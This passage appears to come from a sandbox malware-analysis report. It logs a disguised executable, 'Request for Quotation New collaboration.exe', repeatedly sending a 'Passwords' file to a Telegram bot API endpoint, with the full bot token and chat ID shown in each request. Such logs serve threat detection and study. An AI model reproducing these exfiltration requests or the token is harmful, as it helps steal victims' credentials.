                                                                                                                                2024-12-09 07:33:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 30 31 34 32 62 35 38 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd190142b581ddContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:14 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:14 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:14 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1307,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729594,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.949800149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:17 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd192ae3f7a3c5
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 32 61 65 33 66 37 61 33 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd192ae3f7a3c5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:18 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:18 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:18 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1308,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729598,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.949810149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:21 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1955993a0d8b
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 35 35 39 39 33 61 30 64 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1955993a0d8bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:21 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:21 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 539
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:21 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1309,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729601,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.949820149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:24 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd197eb93c5cf4
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 37 65 62 39 33 63 35 63 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd197eb93c5cf4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:25 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:24 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:25 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1310,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729604,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.949831149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:27 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd19a8eb1779e4
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 61 38 65 62 31 37 37 39 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd19a8eb1779e4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:28 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:28 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:28 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1311,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729608,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.949840149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:31 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd19d6c99f3d5c
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 64 36 63 39 39 66 33 64 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd19d6c99f3d5cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:32 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:31 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:32 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1312,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729611,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.949850149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:34 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1a09955ebf67
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 61 30 39 39 35 35 65 62 66 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1a09955ebf67Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:35 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:35 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 539
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:35 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1313,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729615,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.949860149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:38 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1a413e5c3134
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
